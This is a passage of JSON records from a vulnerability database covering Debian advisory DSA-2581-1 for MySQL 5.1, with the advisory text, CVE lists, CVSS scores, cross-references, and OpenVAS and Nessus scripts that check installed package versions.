\"http://www.debian.org/security/2012/dsa-2581.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "type": "openvas", "viewCount": 5}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-04-06T11:23:39"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-03-19T12:39:35", "references": [{"idList": ["DEBIAN:DSA-2581-1:29892"], "type": "debian"}, {"idList": ["OPENSUSE-SU-2013:0156-1", "OPENSUSE-SU-2013:0135-1", "OPENSUSE-SU-2013:0014-1", "OPENSUSE-SU-2013:0011-1", "OPENSUSE-SU-2013:0013-1"], "type": "suse"}, {"idList": ["ELSA-2012-1462", "ELSA-2012-1551"], "type": "oraclelinux"}, {"idList": ["USN-1658-1", "USN-1621-1"], "type": "ubuntu"}, {"idList": ["EDB-ID:23075"], "type": "exploitdb"}, {"idList": ["SSV:60545"], "type": "seebug"}, {"idList": ["SOL14907"], "type": "f5"}, {"idList": ["MYSQL_5_1_64.NASL", "UBUNTU_USN-1621-1.NASL", "MYSQL_5_1_66.NASL", "MYSQL_5_1_65.NASL", "REDHAT-RHSA-2012-1462.NASL", "SL_20121114_MYSQL_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-1462.NASL", "CENTOS_RHSA-2012-1462.NASL", "DEBIAN_DSA-2581.NASL", "MYSQL_5_5_28.NASL"], "type": "nessus"}, {"idList": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "type": "cve"}, {"idList": ["ALAS-2012-145", "ALAS-2012-144"], "type": "amazon"}, {"idList": ["CESA-2012:1551", "CESA-2012:1462"], "type": "centos"}, {"idList": ["OPENVAS:892581", "OPENVAS:881538", "OPENVAS:1361412562310812190", "OPENVAS:841207", "OPENVAS:1361412562310870861", "OPENVAS:1361412562310881538", "OPENVAS:870861", "OPENVAS:1361412562310123778", "OPENVAS:1361412562310803111", "OPENVAS:1361412562310841207"], "type": "openvas"}, {"idList": ["PACKETSTORM:118550"], "type": "packetstorm"}, {"idList": ["RHSA-2012:1551", "RHSA-2012:1462"], "type": "redhat"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "478589cffa9f85288ded01ffc4072f279d74895294af97101c1f01fcef99fbc2", "hashmap": [{"hash": "0ab63d3b51a6f05e35fdb0f1989bc938", "key": "cvelist"}, {"hash": "45e8ce81b5f3687beb90685650851114", "key": "pluginID"}, {"hash": "6ec3ed5cb876fb3f574cd22b3d3dbb92", "key": "description"}, {"hash": "6d84a31130c53d8702099ffe14b422e2", "key": "references"}, {"hash": "afe641fb4220273d14581d406e316958", "key": "sourceData"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ff1b2ce4fa539c93aaea30a825c0255c", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f4a2955c82206641eaba1c51dd57ed61", "key": "title"}, {"hash": "94c4a7e4814542b0a23cdcf7b13a6b1c", "key": "published"}, {"hash": "4ea840ff73b6affb0ff1787d26923e0e", "key": "cvss"}, {"hash": "794011abc4b4138b6851156385528827", "key": "href"}, {"hash": "5474798d22021d679c1738be31fc4947", "key": "reporter"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892581", "id": "OPENVAS:1361412562310892581", "lastseen": "2019-03-19T12:39:35", "modified": "2019-03-18T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310892581", "published": "2013-09-18T00:00:00", "references": ["http://www.debian.org/security/2012/dsa-2581.html"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892581\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2012/dsa-2581.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"mysql-5.1 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "type": "openvas", "viewCount": 5}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2019-03-19T12:39:35"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "0ab63d3b51a6f05e35fdb0f1989bc938"}, {"key": "cvss", "hash": "62e86bb7716385cd46817416916a7bbd"}, {"key": "description", "hash": "6ec3ed5cb876fb3f574cd22b3d3dbb92"}, {"key": "href", "hash": "794011abc4b4138b6851156385528827"}, {"key": "modified", "hash": "ff1b2ce4fa539c93aaea30a825c0255c"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "45e8ce81b5f3687beb90685650851114"}, {"key": "published", "hash": "94c4a7e4814542b0a23cdcf7b13a6b1c"}, {"key": "references", "hash": "6d84a31130c53d8702099ffe14b422e2"}, {"key": "reporter", "hash": "5474798d22021d679c1738be31fc4947"}, {"key": "sourceData", "hash": "afe641fb4220273d14581d406e316958"}, {"key": "title", "hash": "f4a2955c82206641eaba1c51dd57ed61"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "7bc39254700a57965db248e8cab30d09877467310cfdca7129c4bdf2d27b1a8b", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["DEBIAN_DSA-2581.NASL", "MYSQL_5_1_65.NASL", "ORACLELINUX_ELSA-2012-1462.NASL", "CENTOS_RHSA-2012-1462.NASL", "SL_20121114_MYSQL_ON_SL6_X.NASL", "REDHAT-RHSA-2012-1462.NASL", "UBUNTU_USN-1621-1.NASL", "MYSQL_5_1_64.NASL", "MYSQL_5_1_66.NASL", "MARIADB_5_5_28.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2581-1:29892"]}, {"type": "openvas", "idList": ["OPENVAS:892581", "OPENVAS:1361412562310812190", "OPENVAS:1361412562310803111", "OPENVAS:841207", "OPENVAS:1361412562310841207", "OPENVAS:870861", "OPENVAS:1361412562310123778", "OPENVAS:1361412562310812191", "OPENVAS:1361412562310870861", "OPENVAS:881538"]}, {"type": "cve", "idList": ["CVE-2012-3163", "CVE-2012-5611", "CVE-2012-3150", "CVE-2012-3158", "CVE-2012-3160", "CVE-2012-3177", "CVE-2012-3173", "CVE-2012-3166", "CVE-2012-3167", "CVE-2012-3180"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1462", "ELSA-2012-1551"]}, {"type": "redhat", "idList": ["RHSA-2012:1462", "RHSA-2012:1551"]}, {"type": "ubuntu", "idList": ["USN-1621-1", "USN-1658-1"]}, {"type": "f5", "idList": ["SOL14907"]}, {"type": "centos", "idList": ["CESA-2012:1462", "CESA-2012:1551"]}, {"type": "seebug", "idList": ["SSV:60545"]}, {"type": "amazon", "idList": ["ALAS-2012-144", "ALAS-2012-145"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118550"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0013-1", "OPENSUSE-SU-2013:0011-1", "OPENSUSE-SU-2013:0156-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:23075"]}], "modified": "2019-05-29T18:37:57"}, "score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:37:57"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892581\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2012/dsa-2581.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"mysql-5.1 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks", "pluginID": "1361412562310892581", "scheme": null}
{"debian": [{"lastseen": "2019-10-24T22:38:52", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2581-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nDecember 04, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mysql-5.1\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-3150 CVE-2012-3158 CVE-2012-3160 CVE-2012-3163 \n CVE-2012-3166 CVE-2012-3167 CVE-2012-3173 CVE-2012-3177\n CVE-2012-3180 CVE-2012-3197 CVE-2012-5611\nDebian Bug : 690778 695001\n\nSeveral issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the MySQL\nrelease notes at: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\n\nFor the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and "king cope") is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-12-04T07:02:14", "published": "2012-12-04T07:02:14", "id": "DEBIAN:DSA-2581-1:29892", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00225.html", "title": "[SECURITY] [DSA 2581-1] mysql-5.1 security update", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-12-13T06:51:16", "bulletinFamily": "scanner", "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream\nversion, 5.1.66, which includes additional changes, such as\nperformance improvements and corrections for data loss defects. These\nchanges are described in the MySQL release notes.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The\nvulnerability (discovered independently by Tomas Hoger from the Red\nHat Security Response Team and ", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-2581.NASL", "href": "https://www.tenable.com/plugins/nessus/63151", "published": "2012-12-05T00:00:00", "title": "Debian DSA-2581-1 : mysql-5.1 - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2581. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63151);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/19 11:02:41\");\n\n script_cve_id(\"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\", \"CVE-2012-5611\");\n script_bugtraq_id(55990, 56003, 56005, 56017, 56018, 56021, 56027, 56028, 56036, 56041, 56769);\n script_xref(name:\"DSA\", value:\"2581\");\n\n script_name(english:\"Debian DSA-2581-1 : mysql-5.1 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream\nversion, 5.1.66, which includes additional changes, such as\nperformance improvements and corrections for data loss defects. These\nchanges are described in the MySQL release notes.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The\nvulnerability (discovered independently by Tomas Hoger from the Red\nHat Security Response Team and 'king cope') is a stack-based buffer\noverflow in acl_get() when checking user access to a database. Using a\ncarefully crafted database name, an already authenticated MySQL user\ncould make the server crash or even execute arbitrary code as the\nmysql system user.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=695001\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-5611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/mysql-5.1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mysql-5.1 packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.1.66-0+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libmysqlclient-dev\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmysqlclient16\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmysqld-dev\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmysqld-pic\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-client\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-client-5.1\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-common\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-server\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-server-5.1\", reference:\"5.1.66-0+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mysql-server-core-5.1\", reference:\"5.1.66-0+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:09:48", "bulletinFamily": "scanner", "description": "The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.65 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - Information Schema\n 